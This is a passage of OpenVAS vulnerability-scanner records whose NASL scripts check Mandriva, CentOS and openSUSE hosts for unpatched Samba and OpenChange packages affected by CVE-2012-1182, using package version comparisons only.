rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", 
rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:26", "description": "Check for the Version of openchange", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for openchange CESA-2013:0515 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:881680", "href": "http://plugins.openvas.org/nasl.php?oid=881680", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openchange CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. 
Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. 
This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\");\n script_id(881680);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:02:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for openchange CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for samba (openSUSE-SU-2012:0508-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850289", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850289", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850289\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0508-1\");\n script_name(\"openSUSE: Security Advisory for samba (openSUSE-SU-2012:0508-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 11.4\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. 
Remote attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n\n - -changelog samba) for more details of the version update.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", 